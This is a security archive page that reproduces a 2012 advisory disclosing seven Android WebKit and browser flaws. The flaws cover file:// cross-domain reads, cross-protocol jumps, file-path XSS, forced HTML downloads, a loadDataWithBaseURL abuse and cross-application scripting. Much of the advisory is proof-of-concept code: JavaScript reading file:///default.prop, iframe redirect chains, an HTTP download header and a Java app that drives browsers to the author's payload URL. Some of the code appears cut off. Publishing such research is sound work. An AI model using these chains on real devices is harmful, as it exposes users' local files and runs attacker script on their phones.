exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Android Webkit XSS / Cross Domain Issues

Android Webkit XSS / Cross Domain Issues
Posted Feb 8, 2012
Authored by 80vul | Site 80vul.com

Android suffers from multiple cross site scripting, cross domain, auto file download and cross protocol vulnerabilities.

tags | exploit, vulnerability, protocol, xss
SHA-256 | a1d1a21cef752ac336635608065950185fee872c9f2986f93039600444e3c1ab

Android Webkit XSS / Cross Domain Issues

Change Mirror Download
Android  Multiple  Vulnerabilities

Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2012/2/8
References: http://www.80vul.com/android/android-0days.txt

Ph4nt0m Webzine 0x06 has been
three papers on the android application security about the development
environment,browser security, inter-application communication.And published
a lot of 0days:

[0day-NO.0] android-webkit local cross-domain vulnerability

android-webkit allow local html files cross any http domain and the local

var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP',
for(var i=0; i<versions.length; i++) {
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}


//xmlhttp.open("GET", "file://///default.prop", false);
//xmlhttp.open("GET", "http://www.80vul.com/", false);
var ret = xmlhttp.responseText;


[0day-NO.1] android-webkit cross-protocol vulnerability

this vul allow cross to the file protocol from http. demo:

<iframe name=f src="location.php" ></iframe>
function init(){
f.location = "file:///default.prop";

location.php codz:

[0day-NO.2] android-webkit file:// protocol xss vulnerability

ON android-webkit File:// protocol, the lack of filtering on the directory
and file name,Lead to cross-site scripting attacks. demo:

visit this : file:///80vul.com/<script>alert(1);</script>

[0day-NO.3] android-browser/firefox auto download the file vulnerability

android-browser/firefox Handle the Content-Disposition: attachment, lack of
safety tips.So through this vul allows users to automatically download the
evil html file to the local directory.

test this code:

header("Content-Disposition: attachment:filename=autodown.htm");
print $data;

the local file name and the path:

android 1.x --> /sdcard/download/autodown.html
android 2.x-3.x --> /sdcard/download/autodown.htm
android 4.0 --> /sdcard/download/autodown.php
firefox --> /sdcard/download/autodown.php

So,Let's play a jigsaw puzzle:

<iframe name=f src="location.php" ></iframe>
function init(){
f.location = "file:///ssss<sc"+"ript>alert(1);</sc"+"ript>/";

<meta http-equiv="refresh" content="0;URL=autodown.php"/>
<iframe name=f src="location.php" ></iframe>
function init(){
f.location = "file:///sdcard/Download/autodown.htm";

Now ,We can execute arbitrary js code on the local domain, and we can cross
any http domain and the local file used [0day-NO.0].

and go on ...

[0day-NO.4] webview.loadDataWithBaseURL() cross-protocol vulnerability

By controlling the second argument of webview.loadDataWithBaseURL(),can
cross the file:// protocol use javascript,like
<script>window.location='file://///default.prop';</script> .so the dome apk

WebView webview;
webview = (WebView) findViewById(R.id.webview);
webview.setWebChromeClient(new WebChromeClient());
webview.loadDataWithBaseURL("http://www.baidu.com/", data,
"text/html", "utf-8", null);

[0day-NO.5] com.htc.googlereader XSS vulnerability

com.htc.googlereader is an app on HTC Mobile [G10], there is a xss vul on
this app, then Decompilation and Found this codz:

label399: String str = this.mHeadlineShown.getSummary();
if (str.trim().contains("<iframe"))
this.mWebView.loadData(str, "text/html", "utf-8");
break label246;
this.mWebView.loadDataWithBaseURL("http://", str, "text/html",
"utf-8", null);
break label246;

the "str" have no filter and can be controlled by evil RSS:

<description><![CDATA[aa<script src='
<pubDate>Sun, 04 Sep 2011 13:01:40 -0500</pubDate>

When opens the unread status of the rss, u can get the XSS vul. and this
is mWebView.loadDataWithBaseURL(),so can cross file:// by [0day-NO.4].

[0day-NO.6] Some Browsers for android Cross-Application Scripting

the evil app can cross browser and execute arbitrary js code on the local
domain. the demo app codz:

//codz base on http://blog.watchfire.com/files/advisory-android-browser.pdf
package com.x;
//com.opera.browser com.opera.Opera

//org.mozilla.firefox org.mozilla.firefox.App

//com.android.browser com.android.browser.BrowserActivity

import android.app.Activity;
import android.content.ComponentName;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;

public class TesttestActivity extends Activity {
static final String mPackage = "com.android.browser";
static final String mClass = "com.android.browser.BrowserActivity";
static final String gomPackage = "com.opera.browser";
static final String gomClass = "com.opera.Opera";
static final String mUrl = "http://www.80vul.com/autodown.php";
static final int mSleep = 15000;
public void onCreate(Bundle savedInstanceState) {
try {
catch (InterruptedException e) {}
private void startBrowserActivity(String url) {
Intent res = new Intent("android.intent.action.VIEW");
res.setComponent(new ComponentName(mPackage,mClass));
private void startBrowserActivitygo(String url) {
Intent res = new Intent("android.intent.action.VIEW");
res.setComponent(new ComponentName(gomPackage,gomClass));

Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By